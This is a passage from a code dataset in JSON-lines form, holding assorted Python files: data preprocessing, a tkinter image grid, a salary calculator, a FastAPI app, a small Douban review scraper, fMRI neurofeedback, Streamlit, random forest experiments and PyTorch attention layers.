len(train_y) - 1 #获取最后一行的行号(编号从0开始)\nlast_unit = int(train_y.loc[last_row,'unit']) # 获取最后一个unit的编号 \nfinal_result = []\nfor unit in range(1,last_unit+1):\n slice_by_unit = train_y[train_y.unit==unit] # 切片取出当前unit的所有数据\n result_temp = train_y_copy[train_y_copy.unit==unit] # 切片取出备份数据中当前unit的数据,等待插入\n k = int(slice_by_unit.cycle.quantile(0.75,interpolation='higher')) # 提取当前unit的cycle的3/4分位数\n spin = k # 用一个位置变量作为备份数据拆分边界的指针 \n promote_temp = slice_by_unit[slice_by_unit.cycle>k] # 提取3/4分位数之后的所有数据 \n for line in range(len(promote_temp)):\n promote_cycle = promote_temp.iloc[[line]] \n cycle_temp = int(promote_cycle.cycle) \n y = compute_y(cycle_temp,k) \n inset_temp = [promote_cycle]*y\n inset_temp = pd.concat(inset_temp,axis=0) \n above = result_temp.loc[:spin] \n below = result_temp.loc[spin+1:] \n result_temp = pd.concat([above,inset_temp,below],ignore_index=True)\n spin = spin + y + 1 \n final_result.append(result_temp)\n #print(final_result) \n\nfinal_result = pd.concat(final_result) \n\n\n#**************************************************************写出到文件********************************************************#\nfinal_result.to_csv('extended_RUL_with_unit_cycle_ID_FD001.txt',index=False,header=False,sep=' ')\n\n\n\n\n","repo_name":"ChampionZP/engine_RUL","sub_path":"projects/engine/standard1/extend_RUL_the_same_as_train_X.py","file_name":"extend_RUL_the_same_as_train_X.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"74751764280","text":"from tkinter import *\r\n\r\nbtnList=[\"\"]*9\r\nfnameList= [\"eclair.gif\", \"froyo.gif\", \"gingerbread.gif\", \"honeycomb.gif\", \"icecream.gif\", \"jellybean.gif\", \"kitkat.gif\", \"lollipop.gif\", \"marshmallow.gif\"]\r\nphotoList=[None]*9\r\ni,k=0,0\r\nxPos, yPos=0,0\r\nnum=0\r\n\r\n#메인\r\nwindow=Tk()\r\nwindow.geometry(\"210x210\")\r\n\r\nfor i in range(0,9):\r\n photoList[i]=PhotoImage(file=\"E:/Python/GIF/\"+fnameList[i])\r\n btnList[i]=Button(window, image=photoList[i])\r\n\r\nfor i in range(0,3):\r\n for k in range(0,3):\r\n btnList[num].place(x=xPos,y=yPos)\r\n num+=1\r\n xPos +=70\r\n #초기화\r\n xPos =0\r\n yPos +=70\r\n\r\nwindow.mainloop()\r\n","repo_name":"m-veloper/soldesk-python","sub_path":"gui/gui08.py","file_name":"gui08.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30910175003","text":"# The regular number of working hours per month\r\nREGULAR_HOURS = 100\r\n# The overtime rate for extra hours worked\r\nOVERTIME_RATE = 2\r\n\r\ndef main():\r\n \"\"\"Main function that prompts user for input and calls calculate_salary\"\"\"\r\n # Get employee's name, number of hours worked, and hourly rate from user input\r\n name = input(\"Enter employee's name: \").strip().title()\r\n num_hours = input(\"Enter the number of hours worked per month: \")\r\n rate = input(\"Enter your hourly rate: \")\r\n print('-'*20)\r\n # Call calculate_salary function and print the result\r\n print(calculate_salary(name, num_hours, rate))\r\n\r\n\r\ndef calculate_salary(name, num_hours, rate):\r\n \"\"\"Function that calculates the employee's monthly salary\"\"\"\r\n try:\r\n # Convert num_hours and rate to float\r\n num_hours = float(num_hours)\r\n rate = float(rate)\r\n except ValueError:\r\n # Return an error message if num_hours or rate is not a number\r\n return \"Error: Please enter numeric values for hours worked and hourly rate.\"\r\n\r\n # Calculate salary based on regular hours and overtime hours worked\r\n if num_hours > REGULAR_HOURS:\r\n over_hours = num_hours - REGULAR_HOURS\r\n salary = (REGULAR_HOURS * rate) + (over_hours * rate * OVERTIME_RATE)\r\n else:\r\n salary = num_hours * rate\r\n\r\n # Return the employee's name, number of hours worked, and monthly salary\r\n return f\"{name} has worked {num_hours} hours this month. His salary is {salary:,.2f}$\"\r\n\r\nmain()","repo_name":"mattar740/Problem-Solving","sub_path":"Python for Beginner/Setion 8 Python Conditionals & Lists/1 expressions statements project/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"30916827373","text":"from fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.responses import FileResponse, JSONResponse\nfrom fastapi.openapi.docs import get_swagger_ui_html\nfrom core.util.constants import (\n API_TITLE,\n API_DESCRIPTION,\n API_VERSION,\n API_LICENSE_NAME,\n CONTACT_NAME,\n CONTACT_EMAIL,\n GITHUB_TOS_URL,\n GITHUB_LICENSE_URL,\n FAVICON_PATH,\n FAVICON_URL,\n OPEN_API_URL,\n NAME,\n URL,\n EMAIL\n)\nfrom v1.api import router as v1_router\n\n\n# Initialize FastAPI\napi = FastAPI(\n title=API_TITLE,\n description=API_DESCRIPTION,\n version=API_VERSION,\n terms_of_service=GITHUB_TOS_URL,\n contact={\n NAME: CONTACT_NAME,\n EMAIL: CONTACT_EMAIL,\n },\n license_info={\n NAME: API_LICENSE_NAME,\n URL: GITHUB_LICENSE_URL,\n }\n)\n\n# Add middleware\napi.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"GET\"],\n)\n\n# Add Routers\napi.include_router(v1_router)\n\n\n# Swagger UI HTML\n@api.get(\"/\", include_in_schema=False)\nasync def swagger_ui_html():\n return get_swagger_ui_html(\n title=API_TITLE,\n openapi_url=OPEN_API_URL,\n swagger_favicon_url=FAVICON_URL\n )\n\n\n# Health\n@api.get(path=\"/health\", name=\"Health\", tags=[\"default\"], response_class=JSONResponse, status_code=200)\nasync def health() -> dict:\n \"\"\"\n Check the health of the API.\n \"\"\"\n return {}\n\n\n# Favicon\n@api.get(path='/favicon.ico', name=\"Favicon\", tags=[\"default\"], response_class=FileResponse, include_in_schema=False)\nasync def favicon():\n \"\"\"\n Get the favicon for the API.\n \"\"\"\n return FileResponse(FAVICON_PATH)\n","repo_name":"MoritzHayden/drg-api","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"40"} +{"seq_id":"69840469241","text":"# -*- coding: utf-8 -*-\n\"\"\"\nminiCrawler:\n\n在豆瓣任意找一本图书,抓取它某一页的短评并进行页面解析将短评文字抽取后输出,再对其中的评分进行抽取计算其总分。\n\n【bookid换成自己选择的书名id】\n\"\"\"\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\n\nsum = 0\nr = requests.get('https://book.douban.com/subject/bookid/comments/')\nsoup = BeautifulSoup(r.text, 'lxml')\npattern = soup.find_all('p', 'comment-content')\nfor item in pattern:\n print(item.string)\npattern_s = re.compile('', connectionstyle='arc3,rad=0')) \n\n\nyellow_circle = mlines.Line2D([], [], color='yellow', linestyle='None', \n marker='o',markeredgecolor='black', markeredgewidth=0.5,\n markersize=15, label='Base stimuli')\nred_star = mlines.Line2D([], [], color='red',linestyle='None', marker='*',\n markeredgecolor='black', markeredgewidth=0.5,\n markersize=15, label='Current stimulus')\n\nplt.legend(handles=[yellow_circle, red_star],\n loc='upper center', bbox_to_anchor=(0.5, -0.05),ncol=4)\n\n\n\n\n#%%############################################################################\n# Reading data from TBV #\n###############################################################################\ntimepoint_timing = []\n\n\n#USEFUl FOR OTHER SCANNERS AND SIMULATIONS\nwhile '5' not in event.getKeys(['5']):\n print('Waiting scanner....')\n\n\n# serFmri = serial.Serial('COM1', 57600)\n# prevState = serFmri.getDSR()\n\n# while serFmri.getDSR() == prevState:\n# print('Waiting scanner....')\n \n\nglobalClock.reset() \nprint(\"First trigger!\")\n\n\n#it waits until the first time point is processed by TBV to be sure to \n#read correct data from TBV settings file\nCurrTimePoint = 0\nwhile TBV.get_current_time_point()[0] < 1:\n NrOfTimePoints = TBV.get_expected_nr_of_time_points()[0]\n NrOfROIs = TBV.get_nr_of_rois()[0]\n print('Waiting TBV....')\n\nraw_nf_coords = []\n\nprint(\"OK let's go! Expected TPs: \" + str(NrOfTimePoints)) \n#general loop\nwhile TBV.get_current_time_point()[0] <= NrOfTimePoints:\n \n if CurrTimePoint != TBV.get_current_time_point()[0]:\n timepoint_timing.append([CurrTimePoint ,globalClock.getTime()])\n #update current timepoint\n CurrTimePoint = TBV.get_current_time_point()[0]\n print('Current time point:',str(CurrTimePoint))\n \n \n #looking for a ROI\n if NrOfROIs == 0: \n print('Please add a ROI')\n NrOfROIs = TBV.get_nr_of_rois()[0]\n \n \n else:\n \n if not raw_nf_coords:\n raw_nf_coords = TBV.get_all_coords_of_voxels_of_roi(0)[0]\n \n nf_coords = rtRSAObj.match_coords(raw_nf_coords)\n #needed to avoid accessing to timepoint -1 (fake) or timepoint 0\n if CurrTimePoint > 1 :\n #THE ACTUAL EXPERIMENT STARTS ONLY IF THERE IS A ROI!!!!!!#\n\n #coordinates of voxels of the VOI (index = 0)\n # raw_nf_coords = TBV.get_all_coords_of_voxels_of_roi(0)[0]\n \n # nf_coords = rtRSAObj.match_coords(raw_nf_coords)\n \n #setting the fixation for the baseline\n if CurrTimePoint in baselines[1:,0]:\n fixation.draw()\n win.flip()\n \n #showing only the frame for the imaginative task\n elif CurrTimePoint in tasks[:,0]:\n print('stimulus')\n stimulus.play()\n fixation.draw()\n win.flip()\n \n elif CurrTimePoint in tasks[:,1]:\n stop_stim.play()\n print('stop')\n \n #extract the map and plot the current position\n elif CurrTimePoint in feedbacks[:,0]:\n\n #extractiing tvalues from the ROI\n #in this experimental paradigm we have only one contrast\n tvalues = [TBV.get_map_value_of_voxel(0,coords)[0] \n for coords in nf_coords]\n\n #estimate nwe stimulus coordinates\n stimulus_positions[idx_ctr,:] = rtRSAObj.target_positioning(tvalues)\n \n \n #plotting the new coordinates\n if idx_ctr == 0:\n print('Contrast:',idx_ctr+1)\n plt.scatter(stimulus_positions[idx_ctr,0],\n stimulus_positions[idx_ctr,1], \n marker = '*',s=200, color = 'red', \n edgecolors='black')\n ax.set_facecolor('dimgray')\n plt.xticks([])\n plt.yticks([])\n plt.axis('off')\n else:\n print('Contrast:',idx_ctr)\n plt.scatter(stimulus_positions[:idx_ctr,0],stimulus_positions[:idx_ctr,1], \n marker = '*',s=200, color = 'darkgray')\n plt.scatter(stimulus_positions[idx_ctr,0],stimulus_positions[idx_ctr,1], \n marker = '*',s=200, color = 'red', edgecolors='black')\n #plotting the trajectory\n plt.plot(stimulus_positions[:idx_ctr+1,0],stimulus_positions[:idx_ctr+1,1], '-',\n color = 'green')\n ax.set_facecolor('dimgray')\n plt.xticks([])\n plt.yticks([])\n plt.axis('off')\n \n #save figure\n plt.savefig(os.path.join(outdir,'tvals_Trial' + str(idx_ctr)+ '.png'),\n facecolor='dimgray', edgecolor='none', dpi=300)\n #show the figure()\n image.setImage(os.path.join(outdir,'tvals_Trial' + str(idx_ctr)+ '.png'))\n image.draw()\n win.flip()\n core.wait(fb_duration)\n \n #increment the index of the contrast map\n idx_ctr += 1\n \n elif CurrTimePoint == NrOfTimePoints:\n print('Last time point!')\n #contrast number is fixed for the simulation\n #extract tvalues at the corresponding coordinates\n tvalues = [TBV.get_map_value_of_voxel(0,coords)[0] \n for coords in nf_coords]\n \n #estimate new stimulus coordinates\n stimulus_positions[idx_ctr,:] = rtRSAObj.target_positioning(tvalues)\n \n #plotting the new coordinates\n print('Contrast:',idx_ctr+1)\n plt.scatter(stimulus_positions[:idx_ctr,0],stimulus_positions[:idx_ctr,1], \n marker = '*',s=200, color = 'darkgray')\n for label, x, y in zip(range(idx_ctr),stimulus_positions[:idx_ctr,0],stimulus_positions[:idx_ctr,1]):\n plt.annotate(label,xy=(x, y), xytext=(-5, 5))\n plt.scatter(stimulus_positions[idx_ctr,0],stimulus_positions[idx_ctr,1], \n marker = '*',s=200, color = 'red', edgecolors='black')\n #plotting the trajectory\n plt.plot(stimulus_positions[:idx_ctr+1,0],stimulus_positions[:idx_ctr+1,1],'-',\n color = 'green')\n ax.set_facecolor('dimgray')\n plt.xticks([])\n plt.yticks([])\n plt.axis('off')\n\n \n #save figure\n plt.savefig(os.path.join(outdir,'tvals_Trial' + str(idx_ctr)+ '.png'),\n facecolor='dimgray', edgecolor='none', dpi=300)\n #show the figure()\n image.setImage(os.path.join(outdir,'tvals_Trial' + str(idx_ctr)+ '.png'))\n image.draw()\n win.flip()\n core.wait(fb_duration)\n \n break\n\n else:\n fixation.draw()\n win.flip()\n \n\n \n \nplt.close()\n\nwin.close()\n\n\nwith open(os.path.join(outdir,'timepoint_timing_incrementalGLM.txt'), 'w') as f:\n for item in timepoint_timing:\n f.write(\"%s\\n\" % item) \nf.close() \n\n\n\n ","repo_name":"andreagrusso/rtRSA","sub_path":"experiment/NFrun_7T_paradigm_example.py","file_name":"NFrun_7T_paradigm_example.py","file_ext":"py","file_size_in_byte":14744,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"44588620560","text":"class Solution:\n def reverse(self, x: int) -> int:\n negative = False\n if x < 0:\n negative = True\n x = abs(x)\n revers = int(str(x)[::-1])\n revers = revers*-1 if negative else revers\n \n return 0 if revers > 2**31-1 or revers < -2**31 else revers\n","repo_name":"Protype8/LeetCode","sub_path":"Bit Manipulation/Reverse Integer - LeetCode.py","file_name":"Reverse Integer - LeetCode.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15173177267","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[120]:\n\n\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nimport matplotlib.pyplot as plt\nimport mglearn\nimport random\n\n\n# In[2]:\n\n\ndf = pd.read_csv(\"./data/breast-cancer.data\", header=None)\ndf = df.rename(columns={\n 0: \"Label\", \n 1: \"Age\", \n 2: \"Menopause\",\n 3: \"Tumor Size\",\n 4: \"Inv Nodes\",\n 5: \"Node Caps\",\n 6: \"Malignance Degree\",\n 7: \"Breast\",\n 8: \"Breast Quadrant\",\n 9: \"Irradiated\"\n})\ndf.head(15)\n\n\n# In[3]:\n\n\ndf = df[df[\"Breast Quadrant\"] != \"?\"]\ndf = df[df[\"Node Caps\"] != \"?\"]\n\n\ndef get_label(label):\n if label == \"no-recurrence-events\":\n return 1\n return 0\n\n\ndef get_age(age_range):\n return int(age_range.split(\"-\")[0])\n\n\ndef get_menopause(menopause):\n if menopause == \"premeno\":\n return 1\n elif menopause == \"ge40\":\n return 2\n else:\n return 3\n\n\ndef get_tumor_size(size_range):\n return int(size_range.split(\"-\")[1])\n\n\ndef get_inv_nodes(inv_range):\n return int(inv_range.split(\"-\")[1])\n \n \ndef get_node_caps(caps):\n if caps == \"yes\":\n return 1\n else:\n return 0\n \n\ndef get_breast(breast):\n if breast == \"left\":\n return 1\n else:\n return 0\n \n\ndef get_breast_quad(quad):\n if quad == \"left_low\":\n return 1\n elif quad == \"left_up\":\n return 2\n elif quad == \"right_low\":\n return 3\n elif quad == \"right_up\":\n return 4\n else:\n return 5\n \n \ndef get_irradiated(irr):\n if irr == \"yes\":\n return 1\n else:\n return 0\n\n \ndf[\"Label\"] = df[\"Label\"].apply(lambda x: get_label(x))\ndf[\"Age\"] = df[\"Age\"].apply(lambda x: get_age(x))\ndf[\"Menopause\"] = df[\"Menopause\"].apply(lambda x: get_menopause(x))\ndf[\"Tumor Size\"] = df[\"Tumor Size\"].apply(lambda x: get_tumor_size(x))\ndf[\"Inv Nodes\"] = df[\"Inv Nodes\"].apply(lambda x: get_inv_nodes(x))\ndf[\"Node Caps\"] = df[\"Node Caps\"].apply(lambda x: get_node_caps(x))\ndf[\"Breast\"] = df[\"Breast\"].apply(lambda x: get_breast(x))\ndf[\"Breast Quadrant\"] = df[\"Breast Quadrant\"].apply(lambda x: get_breast(x))\ndf[\"Irradiated\"] = df[\"Irradiated\"].apply(lambda x: get_irradiated(x))\ndf.head(15)\n\n\n# In[4]:\n\n\ndf_X = df.drop(\"Label\", axis=1)\ndf_y = df[\"Label\"]\nX, y = df_X.to_numpy(), df_y.to_numpy()\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, stratify=df_y, random_state=42)\nX_train.shape\n\n\n# In[60]:\n\n\ndef train_and_validate(depth=1, seed=42):\n forest = RandomForestClassifier(n_estimators=5, random_state=seed, max_depth=depth)\n forest.fit(X_train, y_train)\n\n y_pred = forest.predict(X_test)\n total = X_test.shape[0]\n accuracy = (100 * ((y_test == y_pred).sum() / total))\n return accuracy\n\n\n# In[113]:\n\n\naccuracies = [train_and_validate(depth=i) for i in range(1, 11)]\n\n\n# In[114]:\n\n\nx_values = [i for i in range(1, 11)]\naccuracy_max = max(accuracies)\nx_pos = accuracies.index(accuracy_max)\nx_max = x_values[x_pos]\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.plot(x_values, accuracies)\nplt.xticks(x_values)\nplt.xlabel(\"Max depth\")\nplt.ylabel(\"Accuracy\")\nax.set_ylim(70, 83)\n\nax.annotate(f'accuracy = {accuracy_max:.2f}%', xy=(x_max, accuracy_max), xytext=(x_max - 1.3, accuracy_max + 0.5))\n\n# plt.savefig(\"./images/rf_accuracies\")\nplt.show()\n\n\n# In[126]:\n\n\nmain_list = []\nrandom_state = [random.randint(2, 50) for i in range(8)]\nprint(random_state)\n\nfor seed in random_state:\n outer_loop = []\n for depth in range(1, 11):\n outer_loop.append(train_and_validate(depth=depth, seed=seed))\n main_list.append(outer_loop)\n\n\n# In[131]:\n\n\nfig, axes = plt.subplots(2, 4, figsize=(20, 10))\n\na = 0\nfor i in range(2):\n for j in range(4):\n axes[i, j].plot(x_values, main_list[a])\n axes[i, j].set_title(f\"Dataset {a + 1}, seed = {random_state[a]}\")\n axes[i, j].set_xticks(x_values)\n axes[i, j].set_xlabel(\"Max depth\")\n axes[i, j].set_ylabel(\"Accuracy\")\n a = a + 1\n\nplt.subplots_adjust(hspace=0.4, wspace=0.3)\nplt.savefig(\"./images/rf_accuracies_8_datasets\")\nplt.show()\n\n\n# In[132]:\n\n\nmax_accuracies = [max(acc) for acc in main_list]\n\nplt.plot(x_values[:8], max_accuracies)\nplt.xticks(x_values[:8])\nplt.ylabel(\"Accuracy\")\nplt.xlabel(\"Max depth\")\nplt.title(\"Max accuracy for each dataset\")\nplt.show()\n\nmax(max_accuracies)\n\n\n# In[64]:\n\n\n#fig, axes = plt.subplots(2, 3, figsize=(20, 10))\n#for i, (ax, tree) in enumerate(zip(axes.ravel(), forest.estimators_)):\n# ax.set_title(f\"Tree {i}\")\n# mglearn.plots.plot_tree_partition(X_train, y_train, tree, ax=ax)\n#\n#mglearn.plots.plot_2d_separator(forest, X_train, fill=True, ax=axes[-1, -1], alpha=.4)\n#axes[-1, -1].set_title(\"Random Forest\")\n#mglearn.discrete_scatter(X_train[:, 0], X_train[:, -1], y_train)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"cristinatorp/IKT450","sub_path":"Assignments/3. Decision Trees/random_forest.py","file_name":"random_forest.py","file_ext":"py","file_size_in_byte":4805,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"861825746","text":"Nilaibhsindo = input(\"Nilai Bahasa Indonesia:\")\r\nNilaiipa = input(\"Nilai IPA:\")\r\nNilaimat = input(\"Nilai Matematika:\")\r\nStatusKelulusan = \"n\"\r\nif (int(Nilaibhsindo) >= 0) and (int(Nilaiipa) >= 0) and (int(Nilaimat) >= 0):\r\n if (int(Nilaibhsindo) < 60) or (int(Nilaiipa) < 60) or (int(Nilaimat) < 70):\r\n StatusKelulusan = \"x\"\r\n else:\r\n StatusKelulusan = \"y\"\r\nif StatusKelulusan == \"x\":\r\n print(\"Status Kelulusan = TIDAK LULUS\")\r\n print(\"Sebab:\")\r\n if (int(Nilaibhsindo) < 60):\r\n print(\"Nilai Bahasa Indonesia kurang dari 60\")\r\n if (int(Nilaiipa) < 60):\r\n print(\"Nilai IPA kurang dari 60\")\r\n if (int(Nilaimat) < 70):\r\n print(\"Nilai Matematika kurang dari 70\")\r\nelif StatusKelulusan == \"y\":\r\n print(\"Status Kelulusan = LULUS\")\r\nelif StatusKelulusan == \"n\":\r\n print(\"Maaf input ada yang tidak valid\")\r\n ","repo_name":"ardenio88/Pemrograman-Terstruktur","sub_path":"Chapter 5/chapter5(1)_latihan3.py","file_name":"chapter5(1)_latihan3.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71902525241","text":"import streamlit as st\r\nimport pandas as pd\r\nimport os\r\nfrom PIL import Image\r\nst.set_page_config(layout=\"wide\")\r\n\r\n\r\n\r\ndf = pd.read_csv('pub_cleaned.csv')\r\n\r\nst.title(\":red[Pub Locations🍺]\")\r\nimage = Image.open('image_1.jpg')\r\nst.image(image, use_column_width=True)\r\n\r\n\r\nlocation_type = st.selectbox(\r\n \"Select the location type:\",\r\n ('Postal Code', 'Local Authority'))\r\n\r\nif location_type == 'Postal Code':\r\n location = st.selectbox('Select the Postal Code:', df['postcode'].unique())\r\n pubs = df[df['postcode'] == location].reset_index()\r\nelse:\r\n location = st.selectbox('Select Local Authority:', df['local_authority'].unique())\r\n pubs = df[df['local_authority'] == location].reset_index()\r\nst.write(f'Total number of pubs found in the {location} are {len(pubs)}.')\r\n\r\nst.table(pubs[['name','address']])\r\n\r\nst.map(pubs[['latitude', 'longitude']])","repo_name":"Gurram-Sowmya/Pub_App","sub_path":"pages/Pub_locations.py","file_name":"Pub_locations.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32720856949","text":"class Solution:\n def singleNumber(self, nums: List[int]) -> int:\n seen = set()\n \n for num in nums:\n if num not in seen:\n seen.add(num)\n else:\n seen.remove(num)\n return seen.pop()","repo_name":"vinija/LeetCode","sub_path":"136-single-number/136-single-number.py","file_name":"136-single-number.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"40"} +{"seq_id":"429583160","text":"\nfrom random import randint\nimport time\nimport pygame\n\n\nclass DragItem:\n\n def __init__(self, item_size, image_name, game):\n \n self.draggable = False\n self.pressed = False\n self.pos_x = 0\n self.pos_y = 0\n\n # Adding random positions to create a btf effect\n # when start game :)\n self.smooth_pos_x = randint(500*item_size, 500*item_size+500)\n self.smooth_pos_y = -randint(500*item_size, 500*item_size+500)\n if(item_size%2==0):\n self.smooth_pos_x = -self.smooth_pos_x\n \n\n self.game = game\n self.item_size = item_size\n self.item_image = game.assets_manager.get_asset(image_name).asset_load\n self.image_width = self.item_image.get_size()[0]\n self.image_height = self.item_image.get_size()[1]\n\n \n def draw(self):\n\n active = False\n dropped = False\n\n # Checking button status\n rect = pygame.Rect(self.pos_x, self.pos_y, self.image_width, self.image_height)\n mouse_pos = pygame.mouse.get_pos()\n mouse_down = pygame.mouse.get_pressed()[0]\n mouse_first_click = self.game.event_manager.MOUSE_LEFT_CLICK\n\n if(self.draggable):\n\n if(self.pressed and mouse_down):\n active = True\n elif(mouse_first_click):\n if(rect.collidepoint(mouse_pos)):\n self.pressed = True\n active = True\n else:\n if(self.pressed):\n dropped = True\n self.pressed = False\n \n if(active):\n self.pos_x = mouse_pos[0] - self.image_width/2\n self.pos_y = mouse_pos[1] - self.image_height/2\n\n # Smoothing\n self.smooth_pos_x = self.smooth_pos_x-(self.smooth_pos_x-self.pos_x)/8\n self.smooth_pos_y = self.smooth_pos_y-(self.smooth_pos_y-self.pos_y)/8\n\n # Rendering the item\n self.game.render.render_image(self.item_image, self.smooth_pos_x, self.smooth_pos_y)\n\n return dropped\n\n","repo_name":"dansch0/tower-of-hanoi","sub_path":"game/drag_item.py","file_name":"drag_item.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16069114038","text":"# -*- coding=utf-8 -*-\n\n\n# 获取系统配置\nfrom app.main.base.db import system as db_system\n\n\ndef system_list():\n systems = db_system.system_list()\n if systems:\n return systems\n else:\n return False\n\n\ndef system_list_put(data):\n systems = db_system.system_list()\n if systems:\n system = systems[0]\n if data.get('platform_name'):\n system.platform_name = data.get('platform_name').decode(\"utf-8\")\n if data.get('version_information'):\n system.version_information = data.get('version_information').decode(\"utf-8\")\n if data.get('copyright'):\n system.copyright = data.get('copyright').decode(\"utf-8\")\n if data.get('user_authentication_mode'):\n system.user_authentication_mode = data.get('user_authentication_mode').decode(\"utf-8\")\n if data.get('debug') == 0:\n system.debug = False\n elif data.get('debug') == 1:\n system.debug = True\n else: # '请重新输入debug(1代表True,0代表False)'\n return False\n db_system.system_save_db(system)\n return system\n else:\n return False\n\n\ndef system_save(system):\n return db_system.system_save_db(system)\n\n\ndef system_get(sysconfig):\n return db_system.system_get(sysconfig)","repo_name":"zhouliang0v0/naguan-kpy","sub_path":"app/main/base/control/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20048344960","text":"import torch\nfrom torch import nn\nfrom torch.nn import Sequential, Linear, Sigmoid\nimport torch.nn.functional as F\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport math\nimport numpy as np\nimport pandas as pd\n\nclass linear(nn.Module):\n def __init__(self, c_in, c_out):\n super(linear, self).__init__()\n self.mlp = torch.nn.Conv2d(c_in, c_out, kernel_size=(1, 1), padding=(0, 0), stride=(1, 1), bias=True)\n def forward(self, x):\n return self.mlp(x)\n\nclass conv2d_(nn.Module):\n def __init__(self, input_dims, output_dims, kernel_size, stride=(1, 1),\n padding='SAME', use_bias=True, activation=F.relu,\n bn_decay=None):\n super(conv2d_, self).__init__()\n self.activation = activation\n if padding == 'SAME':\n self.padding_size = math.ceil(kernel_size)\n else:\n self.padding_size = [0, 0]\n self.conv = nn.Conv2d(input_dims, output_dims, kernel_size, stride=stride,\n padding=0, bias=use_bias)\n self.batch_norm = nn.BatchNorm2d(output_dims, momentum=bn_decay)\n torch.nn.init.xavier_uniform_(self.conv.weight)\n if use_bias:\n torch.nn.init.zeros_(self.conv.bias)\n\n\n def forward(self, x):\n x = x.permute(0, 3, 2, 1)\n x = x.to('cuda:0')\n x = F.pad(x, ([self.padding_size[1], self.padding_size[1], self.padding_size[0], self.padding_size[0]]))\n x = self.conv(x)\n x = self.batch_norm(x)\n if self.activation is not None:\n x = F.relu_(x)\n return x.permute(0, 3, 2, 1)\n\n\nclass FC(nn.Module):\n def __init__(self, input_dims, units, activations, bn_decay, use_bias=True):\n super(FC, self).__init__()\n if isinstance(units, int):\n units = [units]\n input_dims = [input_dims]\n activations = [activations]\n elif isinstance(units, tuple):\n units = list(units)\n input_dims = list(input_dims)\n activations = list(activations)\n assert type(units) == list\n self.convs = nn.ModuleList([conv2d_(\n input_dims=input_dim, output_dims=num_unit, kernel_size=[1, 1], stride=[1, 1],\n padding='VALID', use_bias=use_bias, activation=activation,\n bn_decay=bn_decay) for input_dim, num_unit, activation in\n zip(input_dims, units, activations)])\n\n def forward(self, x):\n for conv in self.convs:\n x = conv(x)\n return x\n\n\nclass SGEmbedding(nn.Module):\n \"\"\"\n multi-graph spatial embedding\n SE: [num_vertices, D]\n GE: [num_vertices, num_graphs, 1]\n D: output dims = M * d\n retrun: [num_vertices, num_graphs, num_vertices, D]\n \"\"\"\n def __init__(self, D, bn_decay):\n super(SGEmbedding, self).__init__()\n self.FC_se = FC(\n input_dims=[D, D], units=[D, D], activations=[F.relu, None],\n bn_decay=bn_decay)\n\n self.FC_ge = FC(\n input_dims=[5, D], units=[D, D], activations=[F.relu, None],\n bn_decay=bn_decay) # input_dims = graph_nums\n\n def forward(self, SE, GE):\n # spatial embedding\n SE = SE.unsqueeze(0).unsqueeze(0)\n SE = self.FC_se(SE)\n # multi-graph embedding\n graph_embbeding = torch.empty(GE.shape[0], GE.shape[1], 5)\n for i in range(GE.shape[0]):\n graph_embbeding[i] = F.one_hot(GE[..., 0][i].to(torch.int64) % 5, 5)\n GE = graph_embbeding\n GE = GE.unsqueeze(dim=2)\n GE = self.FC_ge(GE)\n del graph_embbeding\n return SE + GE\n\n\nclass spatialAttention(nn.Module):\n '''\n spatial attention mechanism\n X: [num_vertices, num_graphs, num_vertices, D]\n SGE: [num_vertices, num_graphs, num_vertices, D]\n M: number of attention heads\n d: dimension of each attention outputs\n return: [num_vertices, num_graphs, num_vertices, D]\n '''\n def __init__(self, M, d, bn_decay):\n super(spatialAttention, self).__init__()\n self.d = d\n self.M = M\n D = self.M * self.d\n self.FC_q = FC(input_dims=2 * D, units=D, activations=F.relu,\n bn_decay=bn_decay)\n self.FC_k = FC(input_dims=2 * D, units=D, activations=F.relu,\n bn_decay=bn_decay)\n self.FC_v = FC(input_dims=2 * D, units=D, activations=F.relu,\n bn_decay=bn_decay)\n self.FC = FC(input_dims=D, units=D, activations=F.relu,\n bn_decay=bn_decay)\n\n def forward(self, X, SGE):\n num_vertex = X.shape[0]\n X = torch.cat((X, SGE), dim=-1) \n # [num_vertices, num_graphs, num_vertices, 2 * D]\n\n query = self.FC_q(X)\n key = self.FC_k(X)\n value = self.FC_v(X) # [M * num_vertices, num_graphs, num_vertices, d]\n\n query = torch.cat(torch.split(query, self.M, dim=-1), dim=0)\n key = torch.cat(torch.split(key, self.M, dim=-1), 